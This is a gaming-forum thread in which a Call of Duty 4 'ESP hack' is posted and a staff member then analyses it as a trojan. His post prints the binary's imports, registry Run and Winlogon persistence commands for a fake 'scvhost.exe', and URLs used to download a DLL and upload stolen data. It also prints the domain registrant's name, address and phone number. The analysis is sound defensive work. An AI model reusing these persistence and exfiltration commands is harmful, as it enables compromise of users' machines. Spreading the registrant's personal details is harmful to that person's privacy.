HeaveN Cod4 Esp Hack (undetected)

[DreaMan]

Features:
BOX ESP
Undeceted...

How To Use:
Start HeaveN Cod4.exe
Stard COD4 MP
Join a server.

Have Fun...

I tried this esp hack.
It was working 16.03.2009.

QUOTE...

link removed

[CampStaff]

Well, first glance, when we download it, it shows the exe modified date as being 3/23/09, but the dll was modified 2/6/09. So the exe was made a month after the cheat was.

Lets disassemble and hex, shall we:

First thing that happens is when we do that, the exe shows its binded; there are two exe's as your "heaven.exe". Only reason you'd do that is to hide your trojan 'inside' a loader.

Soooo lets disassemble each exe, cikti.exe and new heaven.exe:

Taking cikti.exe first ( since its bigger and by names alone, would be my first choice to be a trojan name ) we find:

Code:

oleaut32.dll    SysFreeString   SysReAllocStringLen   SysAllocStringLen advapi32.dll    RegQueryValueExA    RegOpenKeyExA   RegCloseKey user32.dll    GetKeyboardType   DestroyWindow   LoadStringA   MessageBoxA   CharNextA kernel32.dll    GetACP    Sleep   VirtualFree   VirtualAlloc    GetTickCount    QueryPerformanceCounter   GetCurrentThreadId    InterlockedDecrement    InterlockedIncrement    VirtualQuery    WideCharToMultiByte   MultiByteToWideChar   lstrlenA    lstrcpynA   LoadLibraryExA    GetThreadLocale   GetStartupInfoA   GetProcAddress    GetModuleHandleA    GetModuleFileNameA    GetLocaleInfoA    GetLastError    GetCommandLineA   FreeLibrary   FindFirstFileA    FindClose   ExitProcess   ExitThread    CreateThread    CompareStringA    WriteFile   UnhandledExceptionFilter    SetFilePointer    SetEndOfFile    RtlUnwind   ReadFile    RaiseException    GetStdHandle    GetFileSize   GetFileType   CreateFileA   CloseHandle kernel32.dll    TlsSetValue   TlsGetValue   LocalAlloc    GetModuleHandleA  user32.dll    CreateWindowExA   WindowFromPoint   WaitMessage   UpdateWindow    UnregisterClassA    UnhookWindowsHookEx   TranslateMessage    TranslateMDISysAccel    TrackPopupMenu    SystemParametersInfoA   ShowWindow    ShowScrollBar   ShowOwnedPopups   SetWindowsHookExA   SetWindowPos    SetWindowPlacement    SetWindowLongW    SetWindowLongA    SetTimer    SetScrollRange    SetScrollPos    SetScrollInfo   SetRect   SetPropA    SetParent   SetMenuItemInfoA    SetMenu   SetForegroundWindow   SetFocus    SetCursor   SetClassLongA   SetCapture    SetActiveWindow   SendMessageW    SendMessageA    ScrollWindow    ScreenToClient    RemovePropA   RemoveMenu    ReleaseDC   ReleaseCapture    RegisterWindowMessageA    RegisterClipboardFormatA    RegisterClassA    RedrawWindow    PtInRect    PostQuitMessage   PostMessageA    PeekMessageW    PeekMessageA    OffsetRect    OemToCharA    MsgWaitForMultipleObjects   MessageBoxA   MapWindowPoints   MapVirtualKeyA    LoadStringA   LoadKeyboardLayoutA   LoadIconA   LoadCursorA   LoadBitmapA   KillTimer   IsZoomed    IsWindowVisible   IsWindowUnicode   IsWindowEnabled   IsWindow    IsRectEmpty   IsIconic    IsDialogMessageW    IsDialogMessageA    IsChild   InvalidateRect    IntersectRect   InsertMenuItemA   InsertMenuA   InflateRect   GetWindowThreadProcessId    GetWindowTextA    GetWindowRect   GetWindowPlacement    GetWindowLongW    GetWindowLongA    GetWindowDC   GetTopWindow    GetSystemMetrics    GetSystemMenu   GetSysColorBrush    GetSysColor   GetSubMenu    GetScrollRange    GetScrollPos    GetScrollInfo   GetPropA    GetParent   GetWindow   GetMessagePos   GetMessageA   GetMenuStringA    GetMenuState    GetMenuItemInfoA    GetMenuItemID   GetMenuItemCount    GetMenu   GetLastActivePopup    GetKeyboardState    GetKeyboardLayoutNameA    GetKeyboardLayoutList   GetKeyboardLayout   GetKeyState   GetKeyNameTextA   GetIconInfo   GetForegroundWindow   GetFocus    GetDesktopWindow    GetDCEx   GetDC   GetCursorPos    GetCursor   GetClipboardData    GetClientRect   GetClassLongA   GetClassInfoA   GetCapture    GetActiveWindow   FrameRect   FindWindowA   FillRect    EqualRect   EnumWindows   EnumThreadWindows   EnumChildWindows    EndPaint    EnableWindow    EnableScrollBar   EnableMenuItem    DrawTextA   DrawMenuBar   DrawIconEx    DrawIcon    DrawFrameControl    DrawEdge    DispatchMessageW    DispatchMessageA    DestroyWindow   DestroyMenu   DestroyIcon   DestroyCursor   DeleteMenu    DefWindowProcA    DefMDIChildProcA    DefFrameProcA   CreatePopupMenu   CreateMenu    CreateIcon    ClientToScreen    CheckMenuItem   CallWindowProcA   CallNextHookEx    BeginPaint    CharNextA   CharLowerBuffA    CharLowerA    CharUpperBuffA    CharToOemA    AdjustWindowRectEx    ActivateKeyboardLayout  gdi32.dll   UnrealizeObject   StretchBlt    SetWindowOrgEx    SetWinMetaFileBits    SetViewportOrgEx    SetTextColor    SetStretchBltMode   SetROP2   SetPixel    SetEnhMetaFileBits    SetDIBColorTable    SetBrushOrgEx   SetBkMode   SetBkColor    SelectPalette   SelectObject    SaveDC    RestoreDC   Rectangle   RectVisible   RealizePalette    PlayEnhMetaFile   PatBlt    MoveToEx    MaskBlt   LineTo    IntersectClipRect   GetWindowOrgEx    GetWinMetaFileBits    GetTextMetricsA   GetTextExtentPoint32A   GetSystemPaletteEntries   GetStockObject    GetRgnBox   GetPixel    GetPaletteEntries   GetObjectA    GetEnhMetaFilePaletteEntries    GetEnhMetaFileHeader    GetEnhMetaFileBits    GetDeviceCaps   GetDIBits   GetDIBColorTable    GetDCOrgEx    GetCurrentPositionEx    GetClipBox    GetBrushOrgEx   GetBitmapBits   GdiFlush    ExcludeClipRect   DeleteObject    DeleteEnhMetaFile   DeleteDC    CreateSolidBrush    CreatePenIndirect   CreatePalette   CreateHalftonePalette   CreateFontIndirectA   CreateDIBitmap    CreateDIBSection    CreateCompatibleDC    CreateCompatibleBitmap    CreateBrushIndirect   CreateBitmap    CopyEnhMetaFileA    BitBlt  version.dll   VerQueryValueA    GetFileVersionInfoSizeA   GetFileVersionInfoA kernel32.dll    lstrcpyA    lstrcmpA    WriteFile   WaitForSingleObject   VirtualQuery    VirtualAlloc    Sleep   SizeofResource    SetThreadLocale   SetFilePointer    SetEvent    SetErrorMode    SetEndOfFile    ResumeThread    ResetEvent    ReadFile    RaiseException    QueryPerformanceFrequency   QueryPerformanceCounter   MultiByteToWideChar   MulDiv    LockResource    LoadResource    LoadLibraryA    LeaveCriticalSection    InitializeCriticalSection   GlobalFindAtomA   GlobalDeleteAtom    GlobalAddAtomA    GetWindowsDirectoryA    GetVersionExA   GetVersion    GetTimeZoneInformation    GetTickCount    GetThreadLocale   GetTempPathA    GetSystemDirectoryA   GetStdHandle    GetProcAddress    GetModuleHandleA    GetModuleFileNameA    GetLocaleInfoA    GetLocalTime    GetLastError    GetFullPathNameA    GetFileSize   GetFileAttributesA    GetExitCodeThread   GetEnvironmentVariableA   GetDiskFreeSpaceA   GetDateFormatA    GetCurrentThreadId    GetCurrentProcessId   GetCPInfo   FreeResource    InterlockedIncrement    InterlockedExchange   InterlockedDecrement    FreeLibrary   FormatMessageA    FindResourceA   FindFirstFileA    EnumCalendarInfoA   EnterCriticalSection    DeleteFileA   DeleteCriticalSection   CreateThread    CreateProcessA    CreateMutexA    CreateFileA   CreateEventA    CompareStringA    CloseHandle advapi32.dll    RegQueryValueExA    RegQueryInfoKeyA    RegOpenKeyExA   RegFlushKey   RegEnumValueA   RegEnumKeyExA   RegDeleteValueA   RegCreateKeyExA   RegCloseKey shell32.dll   ShellExecuteA wsock32.dll   WSACleanup    WSAStartup    gethostbyname   socket    send    recv    inet_ntoa   inet_addr   htons   connect   closesocket oleaut32.dll    GetErrorInfo    SysFreeString ole32.dll   OleInitialize   CoTaskMemFree   StringFromCLSID   CoCreateInstance    CoUninitialize    CoInitialize  kernel32.dll    Sleep oleaut32.dll    SafeArrayPtrOfIndex   SafeArrayGetUBound    SafeArrayGetLBound    SafeArrayCreate   VariantChangeType   VariantCopy   VariantClear    VariantInit comctl32.dll    _TrackMouseEvent    ImageList_SetIconSize   ImageList_GetIconSize   ImageList_Write   ImageList_Read    ImageList_DragShowNolock    ImageList_DragMove    ImageList_DragLeave   ImageList_DragEnter   ImageList_EndDrag   ImageList_BeginDrag   ImageList_Remove    ImageList_DrawEx    ImageList_Draw    ImageList_GetBkColor    ImageList_SetBkColor    ImageList_Add   ImageList_SetImageCount   ImageList_GetImageCount   ImageList_Destroy   ImageList_Create  advapi32.dll    CryptDestroyHash    CryptHashData   CryptCreateHash   CryptGetHashParam   CryptReleaseContext   CryptAcquireContextA  crypt32.dll   CryptUnprotectData  advapi32.dll    CredEnumerateA  secur32.dll   GetUserNameExA

Wow. Now.. just some of those are good ( used for cheating ) but.. functions like the Crypt_ ones.. are not needed. But eh.. maybe its not a virus/trojan. Lets move on further in our findings.

Code:

 check.bat     cmd /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"  /V Shell /D "explorer.exe

Umm. why are you adding a key to registry for shell to interfere with explorer.exe?

Code:

cmd /c REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V    /D "     " /f   
   del check.bat      checksystem.bat   del checksystem.bat
   SystemRoot    MAHUAHUAHU HAUAHU  ÿ=   asidasdasdkasd adlkasndladn 243l  dasdlkm3pr ld fldsf kf slks   Error          delme.bat      LgzAzxaaKl~\qmg    user32.dll  
   LgzKlx\va}b        ntcom.dll   #   http://www.wardomania.com/ntcom.dll    StartTheHook   
   desklop.ini

Now we are getting somewhere. As we see, your cheat now seems to download a file from wardomania, then captures whats on desktop ( its desktop, not desklop.. learn to spell for win! )

Lets continue with our rudimentary analysis, before we upload to a more professional one:

Code:

Msn Sifreleri:
    ie   multipart/form-data    userfile      http://www.wardomania.com/1stupload.php .   http://www.wardomania.com/status.php?username=     &computername=

Seems after you download your trojan dll into the zombie computer, you gain access and have their info sent to your website. Well about that website. You should have done your homework .. because we got you:

Quote:

Domain name: wardomania.com

Registrant Contact:
Shekshy
Harikalar Diyari ()

Fax:
174 sok no 12 daire 3
Izmir, TR 35550
TR

Administrative Contact:
Shekshy
Harikalar Diyari ()
+90.5332541424
Fax: +1.5555555555
174 sok no 12 daire 3
Izmir, TR 35550
TR

Technical Contact:
Shekshy
Harikalar Diyari ()
+90.5332541424
Fax: +1.5555555555
174 sok no 12 daire 3
Izmir, TR 35550
TR

Status: Locked

Name Servers:
ns1.turkbox.net
ns2.turkbox.net

Creation date: 09 Sep 2007 12:25:08
Expiration date: 09 Sep 2009 12:25:08

So, Harikalar nice to meet you. Theres alot in this exe, but lets just jump to the chase; Anubis:

Anubis - Anubis Analysis

Quote:

Autostart capabilities: This executable registers processes to be executed at system start. This could result in unwanted actions to be performed automatically.

Creates files in the Windows system directory: Malware often keeps copies of itself in the Windows directory to stay undetected by users.

Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary.

Spawns Processes: The executable produces processes during the execution.

Performs Registry Activities: The executable reads and modifies register values. It also creates and monitors register keys.

Well.. lets start..
It adds these files to the host computer:

Quote:

check.bat
C:\WINDOWS\scvhost.exe
\Device\RasAcd
C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\ntcom. dll

it reads these files:

Quote:

C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
c:\
c:\cikti.exe
C:\WINDOWS\
c:\check.bat
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\system32\
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\system32\
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\system32\

and adds these keys to registry:

Quote:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "" = explorer.exe C:\WINDOWS\scvhost.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run "" = C:\WINDOWS\scvhost.exe

seems he wants to fake a Windows file ( svchost.exe ) with his ( s'c'vhost.exe ).

Anyways, again, thanks for your trojan Harikalar Diyari. Its been an experience.

[KiSeL]

cool hack

[DutchNinja]

Campstaff give me a TuT how u do this? campstaff!

[freebullets]

Epic

[Riku98523]

Lol wow that got got owned.

[dionzor]

LOL owned, its great looking at HEX.

well done on the find.

[guymfalkon123]

thx

[ashurov]

why you remove the link?

[Tracky]

Quote:

Originally Posted by ashurov

why you remove the link?

Rly.. Just read through a Thread before answering..
This is a real senseless question.. :/